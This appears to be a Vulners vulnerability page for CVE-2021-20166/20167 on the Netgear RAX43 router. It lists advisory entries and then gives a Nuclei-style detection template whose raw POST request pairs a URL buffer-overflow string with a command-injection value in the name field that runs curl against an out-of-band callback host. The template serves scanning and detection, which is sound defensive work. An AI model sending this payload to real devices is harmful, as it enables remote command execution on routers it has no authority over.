| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| CVE-2021-20166 | 30 Dec 202100:00 | – | attackerkb | |
| CVE-2021-20167 | 30 Dec 202100:00 | – | attackerkb | |
| The vulnerability of NETGEAR RAX43 router’s built-in software lies in the lack of measures to sanitize input data, allowing attackers to execute arbitrary commands. | 9 Mar 202200:00 | – | bdu_fstec | |
| The vulnerability of NETGEAR RAX43 router’s built-in software arises from buffer overflow attacks, which allow attackers to compromise the confidentiality, integrity, and accessibility of the protected information. | 11 Mar 202200:00 | – | bdu_fstec | |
| CVE-2021-20166 | 21 Dec 202400:00 | – | circl | |
| CVE-2021-20167 | 31 Dec 202100:34 | – | circl | |
| Netgear RAX43 命令注入漏洞 | 30 Dec 202100:00 | – | cnnvd | |
| Netgear RAX43 缓冲区错误漏洞 | 30 Dec 202100:00 | – | cnnvd | |
| Netgear RAX43 Command Injection Vulnerability | 3 Jan 202200:00 | – | cnvd | |
| Netgear RAX43 Buffer Overflow Vulnerability | 4 Jan 202200:00 | – | cnvd |
id: CVE-2021-20167
info:
name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun
author: gy741
severity: high
description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.'
impact: |
Authenticated attackers can execute arbitrary commands on the router, potentially compromising all network traffic and connected devices.
remediation: Upgrade to newer release of the RAX43 firmware.
reference:
- https://www.tenable.com/security/research/tra-2021-55
- https://nvd.nist.gov/vuln/detail/CVE-2021-20166
- https://nvd.nist.gov/vuln/detail/CVE-2021-20167
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8
cve-id: CVE-2021-20167
cwe-id: CWE-77
epss-score: 0.0853
epss-percentile: 0.94393
cpe: cpe:2.3:o:netgear:rax43_firmware:1.0.3.96:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: netgear
product: rax43_firmware
tags: cve2021,cve,tenable,netgear,rce,router,vkev,vuln
http:
- raw:
- |
POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1
Host: {{Hostname}}
"name":"';$(curl {{interactsh-url}});'",
"email":"[email protected]"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 4a0a0047304502204e5a5d2e82593a184240c23ff5c275fadbc6a67814c84fd39a8d0c4c8e27c10e022100ab6818582ea71a1fe99fd8bbad1461cb84e5ead5109fe531ea186493e0b1875c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation